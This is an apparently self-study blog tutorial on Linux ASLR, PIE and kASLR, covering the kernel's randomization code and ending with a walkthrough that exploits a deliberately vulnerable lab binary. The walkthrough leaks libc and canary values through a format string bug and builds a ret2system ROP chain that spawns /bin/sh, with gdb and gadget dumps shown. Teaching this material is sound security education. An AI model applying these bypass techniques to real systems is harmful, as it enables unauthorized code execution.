Hey there! I’m finally ready to present you the third installment of the series exploit mitigation techniques.
Today I want to talk about Address Space Layout Randomization or ASLR in short.
Format wise the article will be structured the following way:
- Introduction to the technique
- Current implementation details
- PoC on how to bypass ASLR
Disclaimer: The following is the result of a self study and might contain faulty information. If you find any let me know. Thanks!
- A bunch of spare minutes
- A basic understanding of what causes memory corruptions/information leaks
- The will to ask or look up unknown terms yourself
- ASM/C knowledge
- x64 exploitation basics
- return oriented programming basics
- knowledge from my previous 2 installments
Address Space Layout Randomization
With DEP and canaries in place adversaries could not easily execute arbitrary inserted code in memory anymore.
Memory pages, where buffer contents reside are marked non executable and the canary value prevents a simple overwrite of any return statement within a function.
A problem that was still present and exploited was that executed processes had a static address mapping.
That made it easy to find addresses of library functions or the run binary itself in memory.
Ultimately leading to a successful arc injection attack without much effort.
As a result address space layout randomization (ASLR) emerged to bring another security parameter to the table to deny adversaries easily guessable memory locations.
The idea is to place objects randomly in the virtual address space causing a non trivial problem to solve for an attacker, which is the ability to execute placed malicious code at will.
A very tl;dr version of ASLR would be that a random offset value is added to the base address during process creation to independently change all three areas of a process’s address space, consisting of an executable, mapped and stacked area. In short the most exploited areas: the stack, the heap and the libraries are mapped randomly in memory to prevent abuse.
Linux offers three different ASLR modes which are displayed below:
Linux ASLR can be configured through setting a value in /proc/sys/kernel/randomize_va_space. Three types of flags are available 0 – No randomization. Everything is static. 1 – Conservative randomization. Shared libraries, stack, mmap(), VDSO and heap are randomized. 2 – Full randomization. In addition to elements listed in the previous point, memory managed through brk() is also randomized.
Note: “VDSO” (virtual dynamic shared object) is a small shared library that the kernel automatically maps into the address space of all user-space applications.
Note 2: mmap() creates a new mapping in the virtual address space of the calling process.
Note 3: brk() and sbrk() change the location of the program break, which defines the end of the process’s data segment.
Beyond that Linux systems offer position independent executable (PIE) binaries, which hardens ASLR even more.
PIE is an additional address space randomization technique that compiles and links executables to be fully position independent.
The result is that binaries compiled that way have their code segment, their global offset table (GOT) and their procedure linkage table (PLT) placed at random locations within virtual memory each time the application is executed as well, leaving no more static locations.
Here you can see a simple overview on how a process can behave in memory after three successive executions
Let’s talk about total position independency for a moment!
To make a PIE binary work correctly we have to consider that there needs to be a way for the loader to resolve symbols at runtime.
As the address of the symbol in memory is not a part of the main binary anymore the loader adds a level of indirection in the procedure linkage table (PLT).
Instead of calling, lets say
puts() directly, the .plt section of the binary contains a special entry that points to the loader.
The loader then has to resolve the actual address of the function.
Once it has done that it updates an entry in the Global Offset Table (GOT).
Subsequent calls to the same routine are made by jumps from the GOT entry.
Trivia: The Linux command line program file detects PIE files as dynamic shared objects (DSO) instead of the usual ELF file.
PIE must be viewed as an addition to ASLR, since it would not do any good if there was no ASLR in the first place.
That said since a PIE binary and all of its dependencies are loaded into random locations within virtual memory each time the application is executed return oriented programming (ROP) attacks are much more difficult to execute reliably. __
Okay back to the main topic about ASLR!
Linux based operating systems got a default ASLR implementation since kernel version 2.6.12, which was released in 2005, but got a set of patches to increase security by the PaX project later on. But already in 2001 PaX published the first design and implementation of ASLR. Only years later in 2014 with the release of kernel version 3.14 the possibility to enable kernel address space layout randomization (kASLR) was given, which has the same goal as ASLR, only with the idea in mind to randomize the kernel code location in memory when the system boots.
Since kernel version 4.12 kASLR is enabled by default.
The effectiveness of kASLR has been questioned quite a few times already and a variety of drawbacks are publicly known as of today.
Non the less it adds a further hardening to the system and should not be dismissed that easily.
I have added some references at the end for anyone interested in kASLR exploitation :) .
Side note: Windows machines on the other hand have ASLR and kASLR enabled by default since the launch of Windows Vista in 2006 and work similar, but due to the differences in system design nuances of differences exist and cannot be covered in this paper but looked up in a detailed analysis issued by the CERT Institute.
This makes clear that (k)ASLR and PIE solely rely on keeping the altered memory space secret to be effective.
ASLR implementation - Diving into the Linux kernel
What would a research article look like if we didn’t dig into the implementations ;) .
The kernel is huge and truely a work of geniuses, as a result I will and can just scratch on the surface of the implementations for this article.
This enables us to focus on the relevant parts and keep the article a reasonable length.
Again remember, this will be all Linux specific, so please keep that in mind :) .
Note: We will mostly take a look at the current x86 implementation. Comparing the following to the other implementations is another topic!
Randomizing a memory address
So first of all how does the system get a randomized memory address in the available/valid address range?
Luckily the kernel code is open source and (mostly :D ) documented!
Let’s take a look at the /drivers/char/random.c kernel file that exactly handles our needs:
Essentially what happens here is that in order to generate a random address
randomize_page() takes two arguments: a start address and a range argument.
After some initital page alignment magic what it ultimately comes down to is that it uses the
get_random_long() function and applies a modulo to get a number between the suppiled ‘start’ address within the offered ‘range’ value.
ELF binary loading
If the kernel is instructed to load an ELF binary a routine called
load_elf_binary() is invoked.
This one is located in /fs/binfmt_elf.c.
Here a multitude of things happen.
Lets take a quick look at these parts, which are responsible for the initialization of pointers memory, like the code, data and stack section.
We can see that if the
randomize_va_space variable is higher than 1, and the
PF_RANDOMIZE flag is set, the base address of
brk() is randomized with the
Furthermore the top of the stack gets some randomization treatment as well!
Recall: brk() changes the location of the program break, which defines the end of the process’s data segment (i.e., the program break is the first location after the end of the uninitialized data segment). Increasing the program break has the effect of allocating memory to
the process; decreasing the break deallocates memory.
The x86 implementation of the
randomize_brk() function is located in /arch/x86/kernel/process.c:
It randomizes the given address space by providing the current address with an additional range argument of
0x02000000 using the former
The stack randomization is started in the /fs/binfmt_elf.c as well.
In particular in the
load_elf_binary() we talked above already!
In the end we have 2 components we have to take a look at here. First the
setup_arg_pages() and then
Let’s start with the latter, since it’s needed as a function argument for
It takes the top of the stack as an address and returns a page aligned version of that address +/- some random variable.
This random variable is obtained by calling
get_random_long() and doing once again some further randomization by doing a bitwise AND (&=) assignment with a defined
STACK_RND_MASK and an additional left shift AND («=) assignment with a variable
Okay that was not all for the stack as we outlined just earlier..
The actual stack randomization will take place in /fs/exec.c and more specifically in the
If the stack segment does not grow upwards, the kernel will use
arch_align_stack() to pass the stack top address, which was an argument of the current function we are looking at.
Then it will align the returned value and continue further stack setup.
The alignment procedure again can be found back in /arch/x86/kernel/process.c
If the currently executed task has no
ADDR_NO_RANDOMIZE flag set and furthermore the
randomize_va_space has a value besides 0 the
get_random_int() function is invoked to perform the stack randomization.
This happens in form of retrieving a random
int() value and following up by a modulo (%) operation with 8192.
After decrementing the stack pointer (sp) with the random number in case of an ASLR supported task, the talked about alignment takes place.
On the x86 architecture it will align it by masking it with 0xfffffff0.
Recall: mmap() creates a new mapping in the virtual address space of the calling process. It takes two arguments: a start address for the new mapping and the length of the mapping.
After performing some essential tests to avoid collisions with the randomized virtual address space of the stack the randomization routine for
mmap() is started.
We can find the essential pieces in /arch/x86/mm/mmap.c:
First some calculation of the maximum randomized address via
stack_maxrandom_size() is done.
We can see the routine itself already gets called with a
unsigned long rnd parameter which is used to return a page aligned memory area, where the
rnd is used as a factor.
rnd variable is calculated and retrived beforehand from the
arch_rnd() routine, which looks like:
After checking if randomization shall take places the routine consist of various metrics.
rndbits part depends on whether we have a 32-bit or 64-bit application.
Note: 1UL represents am unsigned long int with a value of 1 represented at the bit level as: 00000000000000000000000000000001
In the end we have the value 1 as an unsigned long int datatype left shifted by the by the
This value is substracted by 1.
Next an AND operation on the binary level with the prior result is taking place.
This lastly gets left shifted by the value residing in
So much for a brief overview of the linux kernel internals for now.
Since the kernel is an ever evolving structure, things might be different in the near future, but the basic routines will most likely stay the same.
Let’s continue since we still have a lot more to talk about!
Next up will be the talk about known ASLR limitations.
Flashback: Data Execution Prevention
Recall: mprotect() changes protection for the calling process’s memory page(s) containing any part of the address range in the interval
Remember my first article about data execution prevention and non executable stacks :) ?
When skimming through the kernel code I found the code snippet responsible for making the stack (not) executable. It was right below the stack randomization part in /fs/exec.c :
For those of you who are still interested: It uses a modified
mprotect() routine which can be found in /mm/mprotect.c.
As good as ASLR sounds on paper it has multiple design flaws especially on 32 bit systems.
Moreover multiple ways around ASLR have been found, which enables adversaries to still exploit applications only with a medium increase in workload in the exploit building phase.
One of the most critical constraints on 32 bit systems is the fragmentation problem that limits the security design a lot.
Objects are randomly mapped in memory, causing “chunks” of free memory in between mapped objects in the address space, which can also be seen in the ASLR graphics at the beginning.
Eventually no big enough memory chunk to hold a new process can be found anymore.
This is less of a problem of 64 bit systems due to increased size in virtual memory address space.
ASLR relies on randomness applied to objects mapped in memory to be effective.
Nevertheless keeping a relative distance to each object in memory is maintained to give growable objects like the stack or heap more freedom, while avoiding fragmentation.
This method introduces a major flaw due to too low entropy values.
On average a 16 bit entropy is present on 32 bit systems, which can be brute forced within minutes at most on current systems.
64 bit systems have around 40 bit available for randomization, from which only around 28 bit can be effectively used for entropy measures, making them slightly more secure.
This only matters as long as one cannot guess some bits due to information leaks or similar tactics.
Furthermore it was observed that the random generator used by ASLR does not produce/was not producing a truly uniform mapping for all libraries on both architectures, so focusing on more likely addresses to hold mapped objects decreases the cost for a brute force attack even further.
Last but not least the fact that libraries are mapped next to each other in memory can be used for correlation attacks, since knowing one library address leaks the positions of all surrounding ones as well.
That enabled an exploit tactic called Offset2lib. There a buffer overflow is used to de-randomize an applications address space and fully abuse this.
Besides the aforementioned facts already known return to known code attacks like ret2libc or return oriented programming work as good as ever if one can find the right addresses to use.
Additionally for kASLR you have to note that gaining a certain pointer, which provides any kind of information about the process allocation in memory can be used to break this technique, since the kernel cannot change its distribution in memory throughout its operating time.
This means that until the next system reboot a new randomization of kernel code in memory will not and more importantly cannot be performed!
This fact makes kASLR weaker than its big brother ASLR, since the latter randomizes for every new spawning process.
Note: binaries compiled without the PIE option are vulnerable even with a fully enabled ASLR present. This is the case, since an attacker could leverage the .text, .plt and .got segment within an executable. That said a valid attack type in this case is return2PLT/GOT or simply ROP!
Defeating ASLR, Stack Canaries and DEP as well as bypassing FULL RELRO on x64
Since ASLR does not bring anything new or fancy to the table and just randomizes the process address space of a given binary I thought we could just jump into x64 exploitation as well.
The vulnerable binary
So let’s get right into it:
The vulnerable program did not change much from last time.
It was already build around being exploited with ASLR in mind ;) Here is the code again:
There are two obvious vulnerabilities at hand.
One being a format string vulnerability in the
We do have full control of the buffer contents and our given input is printed without any checks.
The other one being a buffer overflow possibility in the
Here we can read in 2048 bytes into a buffer which just can hold half of that.
Let’s compile it with
gcc -o vuln_x64 vuln.c -Wl,-z,relro,-z,now.
Also let’s enable full ASLR:
echo 2 > /proc/sys/kernel/randomize_va_space
This results in a binary with the following exploit mitigations in place:
$ checksec vuln_x64 [*] '/home/lab/Git/RE_binaries/ASLR/binaries/vuln_x64' Arch: amd64-64-little RELRO: FULL RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000)
The assembly did not change too much either obviously. For the sake of completeness let’s take a look again:
gdb-peda$ disassemble main Dump of assembler code for function main: 0x0000000000400813 <+0>: push rbp 0x0000000000400814 <+1>: mov rbp,rsp 0x0000000000400817 <+4>: sub rsp,0x10 0x000000000040081b <+8>: mov DWORD PTR [rbp-0x4],edi 0x000000000040081e <+11>: mov QWORD PTR [rbp-0x10],rsi 0x0000000000400822 <+15>: mov edi,0x400930 ; string to be printed 0x0000000000400827 <+20>: mov eax,0x0 0x000000000040082c <+25>: call 0x400620 <[email protected]> ; Welcome message is printed 0x0000000000400831 <+30>: mov rax,QWORD PTR [rip+0x200830] # 0x601068 <[email protected]@GLIBC_2.2.5> 0x0000000000400838 <+37>: mov esi,0x0 0x000000000040083d <+42>: mov rdi,rax 0x0000000000400840 <+45>: call 0x400610 <[email protected]> 0x0000000000400845 <+50>: mov edi,0x400954 ; string to be printed 0x000000000040084a <+55>: mov eax,0x0 0x000000000040084f <+60>: call 0x400620 <[email protected]> ; "$> " 0x0000000000400854 <+65>: mov eax,0x0 0x0000000000400859 <+70>: call 0x400766 <itIsJustASmallLeakSir> ; function call 0x000000000040085e <+75>: mov edi,0xa ; string to be printed "\n" 0x0000000000400863 <+80>: call 0x4005e0 <[email protected]> ; "\n" 0x0000000000400868 <+85>: mov edi,0x400954 ; string to be printed 0x000000000040086d <+90>: mov eax,0x0 0x0000000000400872 <+95>: call 0x400620 <[email protected]> ; "$> " 0x0000000000400877 <+100>: mov eax,0x0 0x000000000040087c <+105>: call 0x4007c4 <trustMeIAmAnEngineer> ; function call 0x0000000000400881 <+110>: mov edi,0x400958 ; string to be printed 0x0000000000400886 <+115>: call 0x4005f0 <[email protected]> ; "\nI reached the end!\n" 0x000000000040088b <+120>: mov eax,0x0 0x0000000000400890 <+125>: leave 0x0000000000400891 <+126>: ret End of assembler dump.
gdb-peda$ disassemble itIsJustASmallLeakSir Dump of assembler code for function itIsJustASmallLeakSir: 0x0000000000400766 <+0>: push rbp 0x0000000000400767 <+1>: mov rbp,rsp 0x000000000040076a <+4>: sub rsp,0x210 0x0000000000400771 <+11>: mov rax,QWORD PTR fs:0x28 ; stack canary right here 0x000000000040077a <+20>: mov QWORD PTR [rbp-0x8],rax 0x000000000040077e <+24>: xor eax,eax 0x0000000000400780 <+26>: lea rax,[rbp-0x210] ; stack setup 0x0000000000400787 <+33>: mov rsi,rax 0x000000000040078a <+36>: mov edi,0x400928 0x000000000040078f <+41>: mov eax,0x0 0x0000000000400794 <+46>: call 0x400650 <[email protected]> ; user input is read 0x0000000000400799 <+51>: lea rax,[rbp-0x210] 0x00000000004007a0 <+58>: mov rdi,rax ; user input is copied to rdi for printing 0x00000000004007a3 <+61>: mov eax,0x0 0x00000000004007a8 <+66>: call 0x400620 <[email protected]> ; buf contents are printed 0x00000000004007ad <+71>: nop 0x00000000004007ae <+72>: mov rax,QWORD PTR [rbp-0x8] ; stack canary check routine starts 0x00000000004007b2 <+76>: xor rax,QWORD PTR fs:0x28 0x00000000004007bb <+85>: je 0x4007c2 <itIsJustASmallLeakSir+92> 0x00000000004007bd <+87>: call 0x400600 <[email protected]> ; stack canary check failure 0x00000000004007c2 <+92>: leave 0x00000000004007c3 <+93>: ret ; return to main End of assembler dump.
Lastly we take a look at
gdb-peda$ disassemble trustMeIAmAnEngineer Dump of assembler code for function trustMeIAmAnEngineer: 0x00000000004007c4 <+0>: push rbp 0x00000000004007c5 <+1>: mov rbp,rsp 0x00000000004007c8 <+4>: sub rsp,0x410 0x00000000004007cf <+11>: mov rax,QWORD PTR fs:0x28 ; stack canary right here 0x00000000004007d8 <+20>: mov QWORD PTR [rbp-0x8],rax 0x00000000004007dc <+24>: xor eax,eax 0x00000000004007de <+26>: lea rax,[rbp-0x410] ; stack setup 0x00000000004007e5 <+33>: mov edx,0x800 0x00000000004007ea <+38>: mov rsi,rax 0x00000000004007ed <+41>: mov edi,0x0 0x00000000004007f2 <+46>: mov eax,0x0 0x00000000004007f7 <+51>: call 0x400630 <[email protected]> ; user input is read 0x00000000004007fc <+56>: nop 0x00000000004007fd <+57>: mov rax,QWORD PTR [rbp-0x8] ; stack canary check routine starts 0x0000000000400801 <+61>: xor rax,QWORD PTR fs:0x28 0x000000000040080a <+70>: je 0x400811 <trustMeIAmAnEngineer+77> 0x000000000040080c <+72>: call 0x400600 <[email protected]> ; stack canary check failure 0x0000000000400811 <+77>: leave 0x0000000000400812 <+78>: ret ; return to main End of assembler dump. gdb-peda$
As you can see, compared to last time, nothing much changed, except that it is a x64 binary this time around.
All other parts should be known by now!
64-bit exploitation crash course
Let’s do a really short introduction to x64 exploitation.
My last two articles only covered x86 PoCs so let’s step up the game a bit further.
Not too much will change, but let’s get everyone roughly on the same level before continuing.
In x86 we have 8 general purpose registers
eax, ebx, ecx, edx, ebp, esp, esi, edi.
On x64 these got extended to 64-bits ( prefix got changed from ‘e’ to ‘r’ ) and 8 other registers
r8, r9, r10, r11, r12, r13, r14, r15 got added.
According to the Application Binary Interface (ABI), the first 6 integer or pointer arguments to a function are passed in registers.
The first argument is placed in
rdi, the second in
rsi, the third in
rdx, and then
rcx, r8 and r9.
Only the 7th argument and onwards are passed on the stack!
r10 is used as a static chain pointer in case of nested functions.
Extra: Return Oriented Programming (ROP) primer
The basic idea behind return oriented programming is that you chain together small ‘gadgets’.
A gadget is a short instruction sequence always ending with some kind of control flow manipulation to invoke the next gadget in the chain.
Most of the times this is a simple
Once we execute a
ret, the address of the next gadget off the stack is popped and control flow jumps to that address.
In particular, ROP is useful for circumventing Address Space Layout Randomization and DEP to gain e.g. arbitrary code execution of some form.
Note: If you want to get even more familiar with ROP check the challenge section of the forum. Multiple writeups of different complexity are waiting to be found.
We can find gadgets in numerous ways.
The easiest way might be to use one of the already existing tools like ropper.
For our binary above the shortened output looks like:
$ ropper2 --file ./vuln_x64 [INFO] Load gadgets from cache [LOAD] loading... 100% [LOAD] removing double gadgets... 100% Gadgets ======= 0x00000000004006c2: adc byte ptr [rax], ah; jmp rax; 0x000000000040090f: add bl, dh; ret; 0x0000000000400754: add byte ptr [rax - 0x7b], cl; sal byte ptr [rcx + rsi*8 + 0x55], 0x48; mov ebp, esp; call rax; 0x000000000040090d: add byte ptr [rax], al; add bl, dh; ret; 0x0000000000400752: add byte ptr [rax], al; add byte ptr [rax - 0x7b], cl; sal byte ptr [rcx + rsi*8 + 0x55], 0x48; mov ebp, esp; call rax; 0x000000000040090b: add byte ptr [rax], al; add byte ptr [rax], al; add bl, dh; ret; [...] 0x0000000000400912: add byte ptr [rax], al; sub rsp, 8; add rsp, 8; ret; 0x000000000040088e: add byte ptr [rax], al; leave; ret; 0x000000000040088f: add cl, cl; ret; 0x0000000000400734: add eax, 0x200936; add ebx, esi; ret; 0x000000000040080b: add eax, 0xfffdefe8; dec ecx; ret; [...] 0x00000000004005bd: add rsp, 8; ret; 0x0000000000400737: and byte ptr [rax], al; add ebx, esi; ret; 0x0000000000400886: call 0x5f0; mov eax, 0; leave; ret; 0x00000000004007bd: call 0x600; leave; ret; [...] 0x00000000004006d0: pop rbp; ret; 0x0000000000400903: pop rdi; ret; 0x0000000000400901: pop rsi; pop r15; ret; 0x00000000004008fd: pop rsp; pop r13; pop r14; pop r15; ret; 0x000000000040075a: push rbp; mov rbp, rsp; call rax; 0x0000000000400757: sal byte ptr [rcx + rsi*8 + 0x55], 0x48; mov ebp, esp; call rax; 0x0000000000400915: sub esp, 8; add rsp, 8; ret; 0x0000000000400914: sub rsp, 8; add rsp, 8; ret; 0x00000000004006ca: test byte ptr [rax], al; add byte ptr [rax], al; add byte ptr [rax], al; pop rbp; ret; 0x0000000000400759: int1; push rbp; mov rbp, rsp; call rax; 0x00000000004007c2: leave; ret; 0x00000000004005c1: ret; 63 gadgets found
You can see that in our small binary over 60 unique gadgets are already present.
Now all that’s left is chaining the right ones together ;) .
In our case this won’t be as complicated, but depending on the binary you want to exploit this task can be a real hassle!
The exploit itself should be quite self explanatory, but let’s quickly walk through it together.
So first of all when launching the binary we wait for it to prompt us for the first input.
When this happens we provide a bunch of format specifiers
%llx. to get a leak from memory.
Recall: %llx. format string is a long long-sized integer
The leak will look something like this:
It turned out that the 2nd leaked value is a random address within libc.
Since we got that one we were able to calculate the base address of libc by looking up the libc mapping of the current process from within gdb.
gdb-peda$ vmmap Start End Perm Name 0x00400000 0x00401000 r-xp /home/lab/Git/RE_binaries/ASLR/binaries/vuln_x64 0x00600000 0x00601000 r--p /home/lab/Git/RE_binaries/ASLR/binaries/vuln_x64 0x00601000 0x00602000 rw-p /home/lab/Git/RE_binaries/ASLR/binaries/vuln_x64 0x01d12000 0x01d33000 rw-p [heap] 0x00007f6c34c55000 0x00007f6c34e15000 r-xp /lib/x86_64-linux-gnu/libc-2.23.so 0x00007f6c34e15000 0x00007f6c35015000 ---p /lib/x86_64-linux-gnu/libc-2.23.so 0x00007f6c35015000 0x00007f6c35019000 r--p /lib/x86_64-linux-gnu/libc-2.23.so 0x00007f6c35019000 0x00007f6c3501b000 rw-p /lib/x86_64-linux-gnu/libc-2.23.so 0x00007f6c3501b000 0x00007f6c3501f000 rw-p mapped 0x00007f6c3501f000 0x00007f6c35045000 r-xp /lib/x86_64-linux-gnu/ld-2.23.so 0x00007f6c35218000 0x00007f6c3521b000 rw-p mapped 0x00007f6c35244000 0x00007f6c35245000 r--p /lib/x86_64-linux-gnu/ld-2.23.so 0x00007f6c35245000 0x00007f6c35246000 rw-p /lib/x86_64-linux-gnu/ld-2.23.so 0x00007f6c35246000 0x00007f6c35247000 rw-p mapped 0x00007ffdc2a72000 0x00007ffdc2a93000 rw-p [stack] 0x00007ffdc2a98000 0x00007ffdc2a9b000 r--p [vvar] 0x00007ffdc2a9b000 0x00007ffdc2a9d000 r-xp [vdso] 0xffffffffff600000 0xffffffffff601000 r-xp [vsyscall] gdb-peda$
We can see that the randomized base address for the used libc starts at
If we substract this value from the random libc leak we get the offset.
This value marks the offset of the random libc address from the base address of libc.
We can use exactly this offset value for any future execution to find our libc base address.
This works, since we may have a fully randomized process memory and with that a randomized libc position in memory, but the offset of things within libraries is not changed and always has the same distance from the base address! Hence calculating the randomized base address of libc with a static offset value is working 100% of the time.
All of this base calculation happens in
Having access to libc is like opening the box of the pandora.
So much useful functions in there.
I chose to go the
ret2system way and calculated the address of
system() and a pointer to
/bin/sh from the libc base address.
All of that happens in
A really valuable information happened to be at the 71th position in the leaked data.
We got our stack canary, which we need to successfully leverage a buffer overflow!
This one is especially easy to spot since its a 16 bit value where the 2 least significant bits are both 0.
I just extracted the value from the dump in
All that is left now is putting it all together.
This happens in
create_payload(canary, system, shell).
I’m filling the buffer until right before it overflows in the stack canary.
Then I’m appending the canary value and continue to overwrite the
RBP with some junk, since it’s irrelevant what we put here for the PoC.
Afterwards our little friend the
pop rdi; ret gadget is put onto the stack.
Lastly a pointer to our wanted shell and the system call itself are added.
Let’s visualize this in gdb.
Right when we hit the
ret instruction in
trustMeIAmAnEngineer after our buffer overflow happened our registers and stack look like this:
[----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x0 RCX: 0x7f6c34d4c260 (<__read_nocancel+7>: cmp rax,0xfffffffffffff001) RDX: 0x800 RSI: 0x7ffdc2a90090 ("aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab"...) RDI: 0x0 RBP: 0x4141414141414141 ('AAAAAAAA') RSP: 0x7ffdc2a904a8 --> 0x400903 (<__libc_csu_init+99>: pop rdi) RIP: 0x400812 (<trustMeIAmAnEngineer+78>: ret) R8 : 0x7f6c35219700 (0x00007f6c35219700) R9 : 0x3 R10: 0x37b R11: 0x246 R12: 0x400670 (<_start>: xor ebp,ebp) R13: 0x7ffdc2a905a0 --> 0x1 R14: 0x0 R15: 0x0 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x40080a <trustMeIAmAnEngineer+70>: je 0x400811 <trustMeIAmAnEngineer+77> 0x40080c <trustMeIAmAnEngineer+72>: call 0x400600 <[email protected]> 0x400811 <trustMeIAmAnEngineer+77>: leave => 0x400812 <trustMeIAmAnEngineer+78>: ret 0x400813 <main>: push rbp 0x400814 <main+1>: mov rbp,rsp 0x400817 <main+4>: sub rsp,0x10 0x40081b <main+8>: mov DWORD PTR [rbp-0x4],edi [------------------------------------stack-------------------------------------] 0000| 0x7ffdc2a904a8 --> 0x400903 (<__libc_csu_init+99>: pop rdi) 0008| 0x7ffdc2a904b0 --> 0x7f6c34de1d57 --> 0x68732f6e69622f ('/bin/sh') 0016| 0x7ffdc2a904b8 --> 0x7f6c34c9a390 (<__libc_system>: test rdi,rdi) 0024| 0x7ffdc2a904c0 --> 0x40080a (<trustMeIAmAnEngineer+70>: je 0x400811 <trustMeIAmAnEngineer+77>) 0032| 0x7ffdc2a904c8 --> 0x7f6c34c75830 (<__libc_start_main+240>: mov edi,eax) 0040| 0x7ffdc2a904d0 --> 0x0 0048| 0x7ffdc2a904d8 --> 0x7ffdc2a905a8 --> 0x7ffdc2a92109 ("./binaries/vuln_x64") 0056| 0x7ffdc2a904e0 --> 0x135244ca0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value gdb-peda$
We can see that all of our final payload is located on the stack.
When executing the
ret instruction the next value on the stack is popped and put into
This will be our
pop rdi; ret gadget.
The top of the stack, the
RSP, is changed accordingly to point to the next value on the stack, which is the pointer to our shell
/bin/sh as well.
[----------------------------------registers-----------------------------------] [...] RBP: 0x4141414141414141 ('AAAAAAAA') RSP: 0x7ffdc2a904b0 --> 0x7f6c34de1d57 --> 0x68732f6e69622f ('/bin/sh') RIP: 0x400903 (<__libc_csu_init+99>: pop rdi) [...] [-------------------------------------code-------------------------------------] => 0x400903 <__libc_csu_init+99>: pop rdi 0x400904 <__libc_csu_init+100>: ret 0x400905: nop 0x400906: nop WORD PTR cs:[rax+rax*1+0x0] [------------------------------------stack-------------------------------------] 0000| 0x7ffdc2a904b0 --> 0x7f6c34de1d57 --> 0x68732f6e69622f ('/bin/sh') 0008| 0x7ffdc2a904b8 --> 0x7f6c34c9a390 (<__libc_system>: test rdi,rdi) 0016| 0x7ffdc2a904c0 --> 0x40080a (<trustMeIAmAnEngineer+70>: je 0x400811 <trustMeIAmAnEngineer+77>) 0024| 0x7ffdc2a904c8 --> 0x7f6c34c75830 (<__libc_start_main+240>: mov edi,eax) 0032| 0x7ffdc2a904d0 --> 0x0 0040| 0x7ffdc2a904d8 --> 0x7ffdc2a905a8 --> 0x7ffdc2a92109 ("./binaries/vuln_x64") 0048| 0x7ffdc2a904e0 --> 0x135244ca0 0056| 0x7ffdc2a904e8 --> 0x400813 (<main>: push rbp) [------------------------------------------------------------------------------] Legend: code, data, rodata, value gdb-peda$
pop rdi; ret now, which will put the current top of the stack into
RDI, which is our shell pointer.
Since our chosen gadget ends with a
ret statment it’s next in the execution flow.
It will continue execution with the next instruction
RSP points to, which is our
[----------------------------------registers-----------------------------------] [...] RDI: 0x7f6c34de1d57 --> 0x68732f6e69622f ('/bin/sh') RBP: 0x4141414141414141 ('AAAAAAAA') RSP: 0x7ffdc2a904b8 --> 0x7f6c34c9a390 (<__libc_system>: test rdi,rdi) RIP: 0x400904 (<__libc_csu_init+100>: ret) [...] [-------------------------------------code-------------------------------------] 0x4008fe <__libc_csu_init+94>: pop r13 0x400900 <__libc_csu_init+96>: pop r14 0x400902 <__libc_csu_init+98>: pop r15 => 0x400904 <__libc_csu_init+100>: ret 0x400905: nop 0x400906: nop WORD PTR cs:[rax+rax*1+0x0] 0x400910 <__libc_csu_fini>: repz ret 0x400912: add BYTE PTR [rax],al [------------------------------------stack-------------------------------------] 0000| 0x7ffdc2a904b8 --> 0x7f6c34c9a390 (<__libc_system>: test rdi,rdi) 0008| 0x7ffdc2a904c0 --> 0x40080a (<trustMeIAmAnEngineer+70>: je 0x400811 <trustMeIAmAnEngineer+77>) 0016| 0x7ffdc2a904c8 --> 0x7f6c34c75830 (<__libc_start_main+240>: mov edi,eax) 0024| 0x7ffdc2a904d0 --> 0x0 0032| 0x7ffdc2a904d8 --> 0x7ffdc2a905a8 --> 0x7ffdc2a92109 ("./binaries/vuln_x64") 0040| 0x7ffdc2a904e0 --> 0x135244ca0 0048| 0x7ffdc2a904e8 --> 0x400813 (<main>: push rbp) 0056| 0x7ffdc2a904f0 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value gdb-peda$
Remember what I introduced in the x64 exploitation crash course?
The first function argument on x64 needs to be put in
We managed to place our pointer to
And that’s all actually!
system() is called with the contents of
RDI as a function argument that gets us a shell.
Alternative PoC: vmmap reveals that our stack ends at 0x00007ffdc2a93000 the 62th value in the leak is within the stack frame (0x7ffdc2a905a0). We could leverage this to call
mprotect()on the stack to make him executable again too!
Address space layout randomization and position independent executables fully randomize the adress space of any executed binary and were implemented not just as another “final defense against attack X” mechanism, but to make exploiting in general a lot more difficult.
The introduced randomness breaks any of the static exploit approaches taken before and made the game a lot more difficult.
But the found design flaws especially on 32 bit operating systems reduce the viability of this technique by quite a lot.
Luckily the era of 32 bit OSes comes to an end nowadays, at least in the desktop and server area, IoT is another topic :) …
The showed PoC introduced x64 exploitation as well as showed how a possible bypass against an ASLR, DEP and stack canary hardened binary can look like.
The used vulnerabilities were more than obvious and real life exploitation is (most often) a lot more difficult, but I think the general idea was conveyed in an easy to digest manner.
At best you have an awesome memory leak, which gets you sone libc address and maybe even the canary.
If RELRO is not fully enabled and we have a viable format string vulnerability at hand we can try to overwrite the entries within the GOT.
PIE makes building ROP chains quite a bit more complex and was left out for the sake of understandability.
Last but not least I hope you enjoyed the reading and as always I would appreciate your feedback to make future articles better!
- Differences Between ASLR on Windows and Linux
- Position Independent Executables (PIE)
- Breaking Kernel Address Space Layout Randomization with Intel TSX
- ASLR support for Linux
- kernel ASLR (kASLR) support for Linux
- Exploiting Linux and PaX ASLR’s weaknesses on 32- and 64-bit systems
- Address Space Layout Randomization by PAX
- Offset2lib: bypassing full ASLR on 64bit Linux
- Surgically returning to randomized lib(c)
- Linux Kernel on Git
- Derandomizing Kernel Address Space Layout for Memory Introspection and Forensics
- Practical Timing Side Channel Attacks against Kernel Space ASLR
- Just-In-Time Code Reuse: On the Effectiveness of Fine-Grained Address Space Layout Randomization
- On the Effectiveness of Address-Space Randomization
New ASLR bypass presented in March 2018